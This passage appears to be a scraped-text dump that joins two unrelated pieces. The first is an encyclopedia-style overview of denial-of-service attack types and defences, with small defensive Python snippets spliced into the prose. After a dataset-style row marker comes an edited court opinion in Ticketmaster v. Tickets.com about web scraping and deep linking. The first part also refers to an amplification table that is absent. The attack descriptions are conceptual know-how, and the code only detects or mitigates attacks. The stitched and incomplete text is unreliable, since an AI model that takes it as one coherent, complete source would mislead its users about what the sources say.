These collections of compromised systems are known as botnets. DDoS tools like Stacheldraht still use classic DoS attack methods centered on IP spoofing and amplification like smurf attacks and fraggle attacks (types of bandwidth consumption attacks). SYN floods (a resource starvation attack) may also be used. Newer tools can use DNS servers for DoS purposes. Unlike MyDoom's DDoS mechanism, botnets can be turned against any IP address. Script kiddies use them to deny the availability of well-known websites to legitimate users. 54 More sophisticated attackers use DDoS tools for the purposes of extortion, including against their business rivals. 55 It has been reported that internet of things (IoT) devices are increasingly being involved in denial-of-service attacks. 56 One noted attack peaked at around 20,000 requests per second and came from around 900 CCTV cameras. 57 UK's GCHQ has tools built for DDoS, named PREDATORS FACE and ROLLING THUNDER. 58 Simple attacks such as SYN floods may appear with a wide range of source IP addresses, giving the appearance of a distributed DoS. These flood attacks do not require completion of the TCP three-way handshake and attempt to exhaust the destination SYN queue or the server bandwidth. Because the source IP addresses can be trivially spoofed, an attack could come from a limited set of sources, or may even originate from a single host. Stack enhancements such as SYN cookies may be effective mitigation against SYN queue flooding but do not address bandwidth exhaustion. In 2022, TCP attacks were the leading method in DDoS incidents, accounting for 63% of all DDoS activity. This includes tactics like TCP SYN, TCP ACK, and TCP floods. With TCP being the most widespread networking protocol, its attacks are expected to remain prevalent in the DDoS threat scene. 15 In 2015, DDoS botnets such as DD4BC grew in prominence, taking aim at financial institutions. 59 Cyber-extortionists typically begin with a low-level attack and a warning that a larger attack will be carried out if a ransom is not paid in bitcoin. 60 Security experts recommend that targeted websites not pay the ransom. The attackers tend to get into an extended extortion scheme once they recognize that the target is ready to pay. 61 First discovered in 2009, the HTTP slow POST attack sends a complete, legitimate HTTP POST header, which includes a Content-Length field to specify the size of the message body to follow. However, the attacker then proceeds to send the actual message body at an extremely slow rate (e.g. 1 byte every 110 seconds). Due to the entire message being correct and complete, the target server will attempt to obey the Content-Length field in the header, and wait for the entire body of the message to be transmitted, which can take a very long time. The attacker establishes hundreds or even thousands of such connections until all resources for incoming connections on the victim server are exhausted, making any further connections impossible until all data has been sent. It is notable that unlike many other DoS or DDoS attacks, which try to subdue the server by overloading its network or CPU, an HTTP slow POST attack targets the logical resources of the victim, which means the victim would still have enough network bandwidth and processing power to operate. 62 Combined with the fact that the Apache HTTP Server will, by default, accept requests up to 2 GB in size, this attack can be particularly powerful. 
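A common server-side defence against the slow POST behaviour just described is to project, from the declared Content-Length and the observed arrival rate, how long the body will take and to drop hopeless connections early. The following is a minimal sketch of that check under assumed names and limits; it is not taken from any particular server.

# Sketch: if the declared Content-Length cannot plausibly arrive within a
# deadline at the observed byte rate, treat the connection as a slow POST.
import time

MAX_BODY_SECONDS = 30    # assumed deadline for receiving the full body

def body_too_slow(content_length, bytes_received, started_at, now=None):
    now = now or time.time()
    elapsed = max(now - started_at, 1e-6)
    rate = bytes_received / elapsed                 # observed bytes/second
    remaining = content_length - bytes_received
    projected = remaining / rate if rate > 0 else float("inf")
    return projected > MAX_BODY_SECONDS

# A 10 MB body arriving at ~2 bytes/second would clearly be flagged:
print(body_too_slow(10_000_000, 120, time.time() - 60))   # True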
HTTP slow POST attacks are difficult to differentiate from legitimate connections and are therefore able to bypass some protection systems. OWASP, an open source web application security project, released a tool to test the security of servers against this type of attack. 63 A Challenge Collapsar (CC) attack is an attack where standard HTTP requests are sent to a targeted web server frequently. The Uniform Resource Identifiers (URIs) in the requests require complicated time-consuming algorithms or database operations which may exhaust the resources of the targeted web server. 64 65 66 In 2004, a Chinese hacker nicknamed KiKi invented a hacking tool to send these kinds of requests to attack a NSFOCUS firewall named Collapsar, and thus the hacking tool was known as Challenge Collapsar, or CC for short. Consequently, this type of attack got the name CC attack. 67 A smurf attack relies on misconfigured network devices that allow packets to be sent to all computer hosts on a particular network via the broadcast address of the network, rather than a specific machine. The attacker will send large numbers of IP packets with the source address faked to appear to be the address of the victim. 68 Most devices on a network will, by default, respond to this by sending a reply to the source IP address. If the number of machines on the network that receive and respond to these packets is very large, the victim's computer will be flooded with traffic. This overloads the victim's computer and can even make it unusable during such an attack. 69 Ping flood is based on sending the victim an overwhelming number of ping packets, usually using the ping command from Unix-like hosts. a It is very simple to launch, the primary requirement being access to greater bandwidth than the victim. Ping of death is based on sending the victim a malformed ping packet, which will lead to a system crash on a vulnerable system. The BlackNurse attack is an example of an attack taking advantage of the required Destination Port Unreachable ICMP packets. A nuke is an old-fashioned denial-of-service attack against computer networks consisting of fragmented or otherwise invalid ICMP packets sent to the target, achieved by using a modified ping utility to repeatedly send this corrupt data, thus slowing down the affected computer until it comes to a complete stop. 70 A specific example of a nuke attack that gained some prominence is the WinNuke, which exploited the vulnerability in the NetBIOS handler in Windows 95. A string of out-of-band data was sent to TCP port 139 of the victim's machine, causing it to lock up and display a Blue Screen of Death. 70 Attackers have found a way to exploit a number of bugs in peer-to-peer servers to initiate DDoS attacks. The most aggressive of these peer-to-peer-DDoS attacks exploits DC . With peer-to-peer there is no botnet and the attacker does not have to communicate with the clients it subverts. Instead, the attacker acts as a puppet master, instructing clients of large peer-to-peer file sharing hubs to disconnect from their peer-to-peer network and to connect to the victim's website instead. 71 72 73 Permanent denial-of-service (PDoS), also known loosely as phlashing, 74 is an attack that damages a system so badly that it requires replacement or reinstallation of hardware. 
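Returning to the smurf attack described above, the amplification comes from the broadcast address: one spoofed echo request can draw a reply from every live host on the misconfigured network. A short, benign illustration using Python's standard ipaddress module and a documentation-only address range:

# Why a smurf attack amplifies: the broadcast address of a network reaches
# every host on it, so one spoofed request can trigger many replies.
import ipaddress

net = ipaddress.ip_network("192.0.2.0/24")            # documentation range
print("broadcast address:", net.broadcast_address)     # 192.0.2.255
print("potential repliers:", net.num_addresses - 2)    # hosts, minus network/broadcast

This is also why disabling directed broadcasts on routers is the standard mitigation for smurf-style reflection.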
75 Unlike the distributed denial-of-service attack, a PDoS attack exploits security flaws which allow remote administration on the management interfaces of the victim's hardware, such as routers, printers, or other networking hardware. The attacker uses these vulnerabilities to replace a device's firmware with a modified, corrupt, or defective firmware image—a process which when done legitimately is known as flashing. The intent is to brick the device, rendering it unusable for its original purpose until it can be repaired or replaced. The PDoS is a pure hardware-targeted attack that can be much faster and requires fewer resources than using a botnet in a DDoS attack. Because of these features, and the potential and high probability of security exploits on network-enabled embedded devices, this technique has come to the attention of numerous hacking communities. BrickerBot, a piece of malware that targeted IoT devices, used PDoS attacks to disable its targets. 76 PhlashDance is a tool created by Rich Smith (an employee of Hewlett-Packard's Systems Security Lab) used to detect and demonstrate PDoS vulnerabilities at the 2008 EUSecWest Applied Security Conference in London, UK. 77 A distributed denial-of-service attack may involve sending forged requests of some type to a very large number of computers that will reply to the requests. Using Internet Protocol address spoofing, the source address is set to that of the targeted victim, which means all the replies will go to (and flood) the target. This reflected attack form is sometimes called a distributed reflective denial-of-service (DRDoS) attack. 78 ICMP echo request attacks (Smurf attacks) can be considered one form of reflected attack, as the flooding hosts send Echo Requests to the broadcast addresses of mis-configured networks, thereby enticing hosts to send Echo Reply packets to the victim. Some early DDoS programs implemented a distributed form of this attack. Amplification attacks are used to magnify the bandwidth that is sent to a victim. Many services can be exploited to act as reflectors, some harder to block than others. 79 US-CERT have observed that different services may result in different amplification factors, as tabulated below: 80 DNS amplification attacks involves an attacker sending a DNS name lookup request to one or more public DNS servers, spoofing the source IP address of the targeted victim. The attacker tries to request as much information as possible, thus amplifying the DNS response that is sent to the targeted victim. Since the size of the request is significantly smaller than the response, the attacker is easily able to increase the amount of traffic directed at the target. 86 87 SNMP and NTP can also be exploited as reflectors in an amplification attack. An example of an amplified DDoS attack through the Network Time Protocol (NTP) is through a command called monlist, which sends the details of the last 600 hosts that have requested the time from the NTP server back to the requester. A small request to this time server can be sent using a spoofed source IP address of some victim, which results in a response 556.9 times the size of the request being sent to the victim. This becomes amplified when using botnets that all send requests with the same spoofed IP source, which will result in a massive amount of data being sent back to the victim. It is very difficult to defend against these types of attacks because the response data is coming from legitimate servers. 
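The 556.9x NTP monlist figure quoted above makes the economics of amplification easy to see with back-of-the-envelope arithmetic. The request size below is an assumption added for illustration; only the amplification ratio comes from the text.

# Rough arithmetic for reflection amplification.
REQUEST_BYTES = 234           # assumed size of one spoofed monlist request
AMPLIFICATION = 556.9         # response-to-request ratio from the text

def reflected_bytes(requests_per_second, seconds):
    return requests_per_second * seconds * REQUEST_BYTES * AMPLIFICATION

# e.g. 1,000 small spoofed requests per second for one minute:
print(f"{reflected_bytes(1_000, 60) / 1e9:.1f} GB directed at the victim")  # ~7.8 GB

The attacker's own upstream cost is only the unamplified request traffic, which is what makes reflectors attractive.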
These attack requests are also sent through UDP, which does not require a connection to the server. This means that the source IP is not verified when a request is received by the server. To bring awareness of these vulnerabilities, campaigns have been started that are dedicated to finding amplification vectors which have led to people fixing their resolvers or having the resolvers shut down completely. citation needed The Mirai botnet works by using a computer worm to infect hundreds of thousands of IoT devices across the internet. The worm propagates through networks and systems taking control of poorly protected IoT devices such as thermostats, Wi-Fi-enabled clocks, and washing machines. 88 The owner or user will usually have no immediate indication of when the device becomes infected. The IoT device itself is not the direct target of the attack, it is used as a part of a larger attack. 89 Once the hacker has enslaved the desired number of devices, they instruct the devices to try to contact an ISP. In October 2016, a Mirai botnet attacked Dyn which is the ISP for sites such as Twitter, Netflix, etc. 88 As soon as this occurred, these websites were all unreachable for several hours. RUDY attack targets web applications by starvation of available sessions on the web server. Much like Slowloris, RUDY keeps sessions at halt using never-ending POST transmissions and sending an arbitrarily large content-length header value. 90 Manipulating maximum segment size and selective acknowledgement (SACK) may be used by a remote peer to cause a denial of service by an integer overflow in the Linux kernel, potentially causing a Kernel panic. 91 Jonathan Looney discovered CVE 2019 11477, CVE 2019 11478, CVE 2019 11479 on June 17, 2019. 92 The shrew attack is a denial-of-service attack on the Transmission Control Protocol where the attacker employs man-in-the-middle techniques. It exploits a weakness in TCP's re-transmission timeout mechanism, using short synchronized bursts of traffic to disrupt TCP connections on the same link. 93 A slow read attack sends legitimate application layer requests, but reads responses very slowly, keeping connections open longer hoping to exhaust the server's connection pool. The slow read is achieved by advertising a very small number for the TCP Receive Window size, and at the same time emptying clients' TCP receive buffer slowly, which causes a very low data flow rate. 94 A sophisticated low-bandwidth DDoS attack is a form of DoS that uses less traffic and increases its effectiveness by aiming at a weak point in the victim's system design, i.e., the attacker sends traffic consisting of complicated requests to the system. 95 Essentially, a sophisticated DDoS attack is lower in cost due to its use of less traffic, is smaller in size making it more difficult to identify, and it has the ability to hurt systems which are protected by flow control mechanisms. 95 96 A SYN flood occurs when a host sends a flood of TCP SYN packets, often with a forged sender address. Each of these packets is handled like a connection request, causing the server to spawn a half-open connection, send back a TCP SYN-ACK packet, and wait for a packet in response from the sender address. However, because the sender's address is forged, the response never comes. These half-open connections exhaust the available connections the server can make, keeping it from responding to legitimate requests until after the attack ends. 
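SYN cookies, mentioned earlier as a stack-level mitigation for the half-open-connection exhaustion just described, are exposed on Linux through a sysctl. A small, Linux-only defensive check (the path is the standard procfs location; behaviour elsewhere is simply "unknown"):

# Defensive check (Linux-only sketch): confirm SYN cookies are enabled.
from pathlib import Path

def syn_cookies_enabled():
    p = Path("/proc/sys/net/ipv4/tcp_syncookies")
    try:
        # "1" = enabled when the SYN backlog overflows, "2" = always on
        return p.read_text().strip() in {"1", "2"}
    except OSError:
        return None  # not Linux, or no permission to read procfs

print("SYN cookies enabled:", syn_cookies_enabled())

As the text notes, this protects the connection table but does nothing for raw bandwidth exhaustion.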
97 A teardrop attack involves sending mangled IP fragments with overlapping, oversized payloads to the target machine. This can crash various operating systems because of a bug in their TCP IP fragmentation re-assembly code. 98 Windows 3.1x, Windows 95 and Windows NT operating systems, as well as versions of Linux prior to versions 2.0.32 and 2.1.63 are vulnerable to this attack. b One of the fields in an IP header is the fragment offset field, indicating the starting position, or offset, of the data contained in a fragmented packet relative to the data in the original packet. If the sum of the offset and size of one fragmented packet differs from that of the next fragmented packet, the packets overlap. When this happens, a server vulnerable to teardrop attacks is unable to reassemble the packets resulting in a denial-of-service condition. 101 Voice over IP has made abusive origination of large numbers of telephone voice calls inexpensive and easily automated while permitting call origins to be misrepresented through caller ID spoofing. According to the US Federal Bureau of Investigation, telephony denial-of-service (TDoS) has appeared as part of various fraudulent schemes: TDoS can exist even without Internet telephony. In the 2002 New Hampshire Senate election phone jamming scandal, telemarketers were used to flood political opponents with spurious calls to jam phone banks on election day. Widespread publication of a number can also flood it with enough calls to render it unusable, as happened by accident in 1981 with multiple 1 area code 867 5309 subscribers inundated by hundreds of calls daily in response to the song "867 5309 Jenny". TDoS differs from other telephone harassment (such as prank calls and obscene phone calls) by the number of calls originated. By occupying lines continuously with repeated automated calls, the victim is prevented from making or receiving both routine and emergency telephone calls. Related exploits include SMS flooding attacks and black fax or continuous fax transmission by using a loop of paper at the sender. It takes more router resources to drop a packet with a TTL value of 1 or less than it does to forward a packet with a higher TTL value. When a packet is dropped due to TTL expiry, the router CPU must generate and send an ICMP time exceeded response. Generating many of these responses can overload the router's CPU. 104 A UPnP attack uses an existing vulnerability in Universal Plug and Play (UPnP) protocol to get past network security and flood a target's network and servers. The attack is based on a DNS amplification technique, but the attack mechanism is a UPnP router that forwards requests from one outer source to another. The UPnP router returns the data on an unexpected UDP port from a bogus IP address, making it harder to take simple action to shut down the traffic flood. According to the Imperva researchers, the most effective way to stop this attack is for companies to lock down UPnP routers. 105 106 In 2014 it was discovered that Simple Service Discovery Protocol (SSDP) was being used in DDoS attacks known as an SSDP reflection attack with amplification. Many devices, including some residential routers, have a vulnerability in the UPnP software that allows an attacker to get replies from UDP port 1900 to a destination address of their choice. With a botnet of thousands of devices, the attackers can generate sufficient packet rates and occupy bandwidth to saturate links, causing the denial of services. 
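The teardrop condition described at the start of this passage is ultimately a bookkeeping check on fragment offsets: each fragment should begin where the previous one ended. A minimal sketch of that overlap test (field names and sample values are illustrative):

# Overlap check for IP fragments of one datagram, given (offset, size) pairs.
def has_overlap(fragments):
    prev_end = 0
    for offset, size in sorted(fragments):
        if offset < prev_end:        # next fragment starts before previous ended
            return True
        prev_end = offset + size
    return False

print(has_overlap([(0, 1000), (800, 600)]))    # True: second fragment overlaps
print(has_overlap([(0, 1000), (1000, 600)]))   # False: contiguous fragments

Modern reassembly code performs exactly this kind of validation instead of trusting the offsets, which is why teardrop only affects the old systems listed above.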
107 108 109 Because of this weakness, the network company Cloudflare has described SSDP as the "Stupidly Simple DDoS Protocol". 110 ARP spoofing is a common DoS attack that involves a vulnerability in the ARP protocol that allows an attacker to associate their MAC address to the IP address of another computer or gateway, causing traffic intended for the original authentic IP to be re-routed to that of the attacker, causing a denial of service. Defensive responses to denial-of-service attacks typically involve the use of a combination of attack detection, traffic classification and response tools, aiming to block traffic the tools identify as illegitimate and allow traffic that they identify as legitimate. 111 A list of response tools include the following. All traffic destined to the victim is diverted to pass through a cleaning center or a scrubbing center via various methods such as: changing the victim IP address in the DNS system, tunneling methods (GRE VRF, MPLS, SDN), 112 proxies, digital cross connects, or even direct circuits. The cleaning center separates bad traffic (DDoS and also other common internet attacks) and only passes good legitimate traffic to the victim server. 113 The victim needs central connectivity to the Internet to use this kind of service unless they happen to be located within the same facility as the cleaning center. DDoS attacks can overwhelm any type of hardware firewall, and passing malicious traffic through large and mature networks becomes more and more effective and economically sustainable against DDoS. 114 Application front-end hardware is intelligent hardware placed on the network before traffic reaches the servers. It can be used on networks in conjunction with routers and switches and as part of bandwidth management. Application front-end hardware analyzes data packets as they enter the network, and identifies and drops dangerous or suspicious flows. Approaches to detection of DDoS attacks against cloud-based applications may be based on an application layer analysis, indicating whether incoming bulk traffic is legitimate. 115 These approaches mainly rely on an identified path of value inside the application and monitor the progress of requests on this path, through markers called key completion indicators. 116 In essence, these techniques are statistical methods of assessing the behavior of incoming requests to detect if something unusual or abnormal is going on. An analogy is to a brick-and-mortar department store where customers spend, on average, a known percentage of their time on different activities such as picking up items and examining them, putting them back, filling a basket, waiting to pay, paying, and leaving. If a mob of customers arrived in the store and spent all their time picking up items and putting them back, but never made any purchases, this could be flagged as unusual behavior. With blackhole routing, all the traffic to the attacked DNS or IP address is sent to a black hole (null interface or a non-existent server). To be more efficient and avoid affecting network connectivity, it can be managed by the ISP. 117 A DNS sinkhole routes traffic to a valid IP address which analyzes traffic and rejects bad packets. Sinkholing may not be efficient for severe attacks. Intrusion prevention systems (IPS) are effective if the attacks have signatures associated with them. However, the trend among attacks is to have legitimate content but bad intent. 
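The key-completion-indicator idea above (the department-store analogy) reduces to comparing how often sessions that start a known path actually finish it against a baseline. The sketch below is only an illustration of that statistic; the baseline, ratio, and function name are assumptions, not values from the cited work.

# Sketch of a key-completion-indicator style check: alert when the fraction of
# sessions completing a valuable path (browse -> cart -> pay) collapses.
BASELINE_COMPLETION = 0.05    # assumed: ~5% of normal sessions reach payment
ALERT_RATIO = 0.2             # alert if observed rate < 20% of baseline

def looks_like_application_flood(sessions_started, sessions_completed):
    if sessions_started == 0:
        return False
    observed = sessions_completed / sessions_started
    return observed < BASELINE_COMPLETION * ALERT_RATIO

print(looks_like_application_flood(10_000, 3))     # True: almost nobody "buys"
print(looks_like_application_flood(10_000, 550))   # False: close to baseline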
Intrusion-prevention systems that work on content recognition cannot block behavior-based DoS attacks. 41 An ASIC based IPS may detect and block denial-of-service attacks because they have the processing power and the granularity to analyze the attacks and act like a circuit breaker in an automated way. 41 More focused on the problem than IPS, a DoS defense system (DDS) can block connection-based DoS attacks and those with legitimate content but bad intent. A DDS can also address both protocol attacks (such as teardrop and ping of death) and rate-based attacks (such as ICMP floods and SYN floods). DDS has a purpose-built system that can easily identify and obstruct denial of service attacks at a greater speed than a software-based system. 118 In the case of a simple attack, a firewall can be adjusted to deny all incoming traffic from the attackers, based on protocols, ports, or the originating IP addresses. More complex attacks will however be hard to block with simple rules: for example, if there is an ongoing attack on port 80 (web service), it is not possible to drop all incoming traffic on this port because doing so will prevent the server from receiving and serving legitimate traffic. 119 Additionally, firewalls may be too deep in the network hierarchy, with routers being adversely affected before the traffic gets to the firewall. Also, many security tools still do not support IPv6 or may not be configured properly, so the firewalls may be bypassed during the attacks. 120 Similar to switches, routers have some rate-limiting and ACL capabilities. They, too, are manually set. Most routers can be easily overwhelmed under a DoS attack. Nokia SR-OS using FP4 or FP5 processors offers DDoS protection. 121 Nokia SR-OS also uses big data analytics-based Nokia Deepfield Defender for DDoS protection. 122 Cisco IOS has optional features that can reduce the impact of flooding. 123 Most switches have some rate-limiting and ACL capability. Some switches provide automatic or system-wide rate limiting, traffic shaping, delayed binding (TCP splicing), deep packet inspection and bogon filtering (bogus IP filtering) to detect and remediate DoS attacks through automatic rate filtering and WAN Link failover and balancing. These schemes will work as long as the DoS attacks can be prevented by using them. For example, SYN flood can be prevented using delayed binding or TCP splicing. Similarly, content-based DoS may be prevented using deep packet inspection. Attacks using Martian packets can be prevented using bogon filtering. Automatic rate filtering can work as long as set rate thresholds have been set correctly. WAN-link failover will work as long as both links have a DoS prevention mechanism. 41 For example, in an SSDP reflection attack; the key mitigation is to block incoming UDP traffic on port 1900 at the firewall. 124 An unintentional denial-of-service can occur when a system ends up denied, not due to a deliberate attack by a single individual or group of individuals, but simply due to a sudden enormous spike in popularity. This can happen when an extremely popular website posts a prominent link to a second, less well-prepared site, for example, as part of a news story. The result is that a significant proportion of the primary site's regular users potentially hundreds of thousands of people click that link in the space of a few hours, having the same effect on the target website as a DDoS attack. A VIPDoS is the same, but specifically when the link was posted by a celebrity. 
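The automatic rate filtering attributed to switches and routers above is commonly implemented as a token bucket: traffic is allowed up to a sustained rate plus a burst allowance, and excess is dropped or queued. A compact, generic sketch (rates here are illustrative, not vendor defaults):

# A token-bucket rate limiter, the shape of "automatic rate filtering".
import time

class TokenBucket:
    def __init__(self, rate_per_sec, burst):
        self.rate = rate_per_sec
        self.capacity = burst
        self.tokens = burst
        self.last = time.monotonic()

    def allow(self):
        now = time.monotonic()
        self.tokens = min(self.capacity, self.tokens + (now - self.last) * self.rate)
        self.last = now
        if self.tokens >= 1:
            self.tokens -= 1
            return True
        return False    # over the configured rate: drop or queue

limiter = TokenBucket(rate_per_sec=100, burst=200)
print(limiter.allow())   # True while within the allowance

As the text cautions, such filtering only works if the thresholds are set correctly for the link and the legitimate workload.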
When Michael Jackson died in 2009, websites such as Google and Twitter slowed down or even crashed. 125 Many sites' servers thought the requests were from a virus or spyware trying to cause a denial-of-service attack, warning users that their queries looked like "automated requests from a computer virus or spyware application". 126 News sites and link sites (sites whose primary function is to provide links to interesting content elsewhere on the Internet) are most likely to cause this phenomenon. The canonical example is the Slashdot effect when receiving traffic from Slashdot. It is also known as "the Reddit hug of death" and "the Digg effect". Routers have also been known to create unintentional DoS attacks, as both D-Link and Netgear routers have overloaded NTP servers by flooding them without respecting the restrictions of client types or geographical limitations. Similar unintentional denial-of-service can also occur via other media, e.g. when a URL is mentioned on television. If a server is being indexed by Google or another search engine during peak periods of activity, or does not have a lot of available bandwidth while being indexed, it can also experience the effects of a DoS attack. 41 Legal action has been taken in at least one such case. In 2006, Universal Tube Rollform Equipment Corporation sued YouTube: massive numbers of would-be YouTube.com users accidentally typed the tube company's URL, utube.com. As a result, the tube company ended up having to spend large amounts of money on upgrading its bandwidth. 127 The company appears to have taken advantage of the situation, with utube.com now carrying ads for advertisement revenue. In March 2014, after Malaysia Airlines Flight 370 went missing, DigitalGlobe launched a crowdsourcing service on which users could help search for the missing jet in satellite images. The response overwhelmed the company's servers. 128 An unintentional denial-of-service may also result from a prescheduled event created by the website itself, as was the case of the Census in Australia in 2016. 129 This can occur when a server provides some service at a specific time. In computer network security, backscatter is a side-effect of a spoofed denial-of-service attack. In this kind of attack, the attacker spoofs (or forges) the source address in IP packets sent to the victim. In general, the victim machine cannot distinguish between the spoofed packets and legitimate packets, so the victim responds to the spoofed packets as it normally would. These response packets are known as backscatter. 130 If the attacker is spoofing source addresses randomly, the backscatter response packets from the victim will be sent back to random destinations. This effect can be used by network telescopes as indirect evidence of such attacks. The term backscatter analysis refers to observing backscatter packets arriving at a statistically significant portion of the IP address space to determine the characteristics of DoS attacks and victims. Many jurisdictions have laws under which denial-of-service attacks are illegal. UNCTAD highlights that 156 countries, or 80% globally, have enacted cybercrime laws to combat its widespread impact. Adoption rates vary by region, with Europe at a 91% adoption rate and Africa at 72%. 
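The backscatter analysis described above scales up what a network telescope observes by the fraction of the address space it watches: if sources are spoofed uniformly at random, a telescope covering 1/256 of IPv4 sees roughly 1/256 of the victim's responses. A small arithmetic sketch under that assumption:

# Backscatter estimation sketch: scale observed backscatter by the inverse of
# the fraction of IPv4 space the telescope monitors (uniform spoofing assumed).
TELESCOPE_PREFIX = 8                       # a /8 network telescope
FRACTION_SEEN = 2 ** -TELESCOPE_PREFIX     # 1/256 of the IPv4 address space

def estimated_attack_pps(observed_backscatter_pps):
    return observed_backscatter_pps / FRACTION_SEEN

print(estimated_attack_pps(400))   # ~102,400 response packets/second at the victim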
132 On January 7, 2013, Anonymous posted a petition on the whitehouse.gov site asking that DDoS be recognized as a legal form of protest similar to the Occupy protests, arguing that the two serve a similar purpose. 140 |
268 | https://en.wikipedia.org/wiki/Web_scraping | http://www.tomwbell.com/NetLaw/Ch07/Ticketmaster.html | 2000 WL 525390, 2000 U.S. Dist. LEXIS 12987, Copy. L. Rep. (CCH) P28146 (C.D. Cal., August 10, 2000) (No. CV99 7654 HLH (BQRx)) (unpublished opinion) NOTE: This case has been edited for classroom use by the omission of text and citations. See this alternate source for the full opinion. U.S. District Judge Harry L. Hupp This motion was argued and submitted 7 31 00, at which time the court took it under submission to consider certain of the points made in oral argument. It is now decided as follows. The tentative ruling previously issued should be disregarded. The motion of Ticketmaster Corporation and Ticketmaster Online-Search, Inc. (hereafter collectively Ticketmaster or TM) for preliminary injunction against Tickets.Com, Inc. (hereafter T.Com) is denied. This matter has taken some significant turns since the matter was last here on the motion to dismiss on March 27, 2000. Some of those differences affect consideration of the motion for preliminary injunction. One significant difference is that since the motion to dismiss, TM devised technical methods of blocking direct access by "deep hyperlinking" to TM interior pages. Thus, at the present time, when T.Com hyperlinks to TM, the references is to the TM home page, where the public accessing TM by internet normally starts. However, this may soon change, as discussed below, because TM has now lost the technical means of preventing deep hyperlinking directly to the event web pages. A second major change is a legal development in the form of decision by Judge Whyte of the Northern District in eBay Inc. v. Builder's Edge NDCA'00 100 FSupp2d 1058. This has caused a revamping of the TM trespass theory to attempt to meet the circumstances which led Judge Whyte to issue a preliminary injunction in the eBay case. A third change which the court considers irrelevant to the items to be considered on this motion for preliminary injunction is the filing of an anti-trust counterclaim by T.Com, accompanied by a flurry of documents (mostly press releases) apparently designed to show that TM has been gobbling up competitors and has generally been giving T.Com a competitive hard time in operating at a profit. While these may become important issues at the anti-trust phase of the case, they do not affect the copyright, Lanham Act, or unfair competition issues presented on this injunction motion. The facts governing this preliminary injunction motion have partly been stated in the minute order of March 27 and will not all be repeated here. (In this respect, the court does not intend this to be a published opinion, but rather a minute order announcing a result, and as a result has not written for publication with the usual citation of excess authorities and other attention to grammatical or literary detail. In addition, no pronouncements of legal significance are intended; those come from the Court of Appeals. While the court cannot prevent publication, such is not done with the permission or desire of the court and also with the hope that any typos are corrected.) The essential facts are that TM operates the largest ticket brokerage business in the country. It has exclusive arrangements to sell the tickets for many of the largest entertainment and athletic events in the country. It sells these tickets through a network of about 2900 retail ticket windows, over the telephone, and through the internet. The internet business is the focus of this case. 
TM maintains a "home" page (www.ticketmaster.com) and has a separate "event" page for each separate event. The typical internet customer accesses the home page and is directed by a series of directories to the particular event page which lists in standardized fashion the basic information about the event (time, place, date, price, seating choices if relevant, and directions on how to order tickets by telephone or directly by interactive internet, presumably using credit cards and how to take delivery UPS, will-call, etc.). The internet business is an increasingly large portion of TM business; the latest figures show about 3,000,000 "hits" a day on the TM home page. TM has a large number of interior event pages which change with additions or modifications of about 35,000 pages per day. This is managed by a set of computers which assign each interior web page a unique electronic address (called a URL) which facilitates the user to reach the precise page for the event in which the user is interested. Aside from the revenue in selling tickets, TM also receives revenue from advertisers who pay based on the number of hits on the page where the advertisement is carried (this is apparently true both of the home page and the event page, since the examples attached show advertisements on both types of pages). The home and event pages carry TM logos, so that the customer cannot be confused by the business entity with which he or she is dealing. The home page contains a statement that the user agrees to the "terms and conditions" of use. One can scroll down to the terms and conditions, which provide, among other things, that use binds one to the terms and conditions, that any use is for the person use of the user, and that no commercial use can be made of the information provided. However, unlike certain other interactive internet programs (see eBay for an example), the user is not required to check an "I agree" box before proceeding to the interior web page wherein is located the information about the particular event in which he or she is interested. T.Com operates in very different fashion. They do, indeed, have certain events in which the directly sell tickets, although very small in number compared to TM. However, their main business appears to operate as a clearing house to provide information as to where tickets to any event may be obtained. Thus, T.Com collects information on as many events as it can, providing its "customer" information on where the tickets may be purchased, whether from T.Com or another source. Where T.Com can sell the tickets itself, it does in a manner similar to TM (phone or internet). However, is also provides information on other sources from which tickets may be purchased. It maintains its own form of event page for each event, listing the basic information (price, date, time, etc.). For the vast number of TM events that it lists, it has a statements that tickets may only be purchased from another ticket broker (not naming TM), and provides a box to check which at the present time will take the user directly by hyperlink to the TM home page. (At the time of the motion to dismiss, the hyperlink took the user directly to the interior web page of TM for the event in question. In the interim, TM found the technical means of preventing this, so the user is now referred directly to the TM home page where he may start wending his way through the directories to the proper interior web page. 
However at oral argument, counsel inform the court that the technical method of blocking deep hyperlink reference directly to the TM event page is no longer applicable. T.com states that it may soon again start referring users directly to the TM event page by the use of deep hyperlinking.) Any ticket sale is made by TM. The proceeds are not shared by T.Com. T.Com also provides references and a telephone number or hyperlink to brokers who sell the tickets, some of which are auction sellers and some of which are "premium" ticket brokers, pejoratively known as "scalpers. T.Com makes money from advertisers, both on its home page and event page and from whatever ticket business in has of its own. The record does not reveal if it also makes a commission on sales by brokers to whom it refers customers, but not, of course, from TM. The vast amount of information provided by T.Com on TM events comes from TM's computers, monitored by T.Com's computers. Since TM's computer information is open to the public, it is also available to T.Com. However, T.Com does not obtain the information in the same way as does the public (that is, by opening up an interior web page and reading the information off the screen), but rather by a sophisticated computer method of monitoring the thousands of interior TM web pages electronically by the use of a mysterious (to the court) devices known as a "webcrawlers" or "spiders"). The T.Com computers enter the TM computers electronically through the home page and make note of the URL's (electronic addresses) of the interior web pages. They then methodically extract the electronic information from the event page (containing the URL (electronic address of the event web page) price, time, date, place, etc.) and copy it temporarily (for 10 15 seconds) on its own computers. The T.Com programs then extract the purely factual information in the T.Com format on its own web pages. Except for the URL (discussed below), the copied TM web page (or, rather, the electronic signals which, if projected on the screen, would make up what the viewer sees on the screen) are then discarded and not used or retained for any other purpose. Thus, the viewer of the T.Com event web page sees only the T.Com version of the facts. The source of the facts are, of course, the TM event web pages. Now, to approach analysis of these facts from the standpoint of a preliminary injunction: The primary star in the copyright sky for this case is that purely factual information may not be copyrighted. Thus, the time, place, venue, price, etc., of public events are not protected by copyright even if great are and expense is expended in gathering the information (see the possibility of the "hot news" exception discussed below). Thus, unfair as it may seem to TM, the basic facts that it gathers and publishes cannot be protected from copying. To be sure, the manner of expression and format of presenting those facts is protectable, but T.Com has taken great care not to use the TM format and expression in publishing the facts that it takes from TM. . . . In the court's opinion, there are two of TM's theories which demand serious consideration on this motion for preliminary injunction and which may well prove decisive at trial although the court does not now consider them sufficient for a preliminary injunction. They are copyright and the trespass theories. As to copyright, there is undeniably copying of the electronic bits which make up the TM event pages when projected on the screen. 
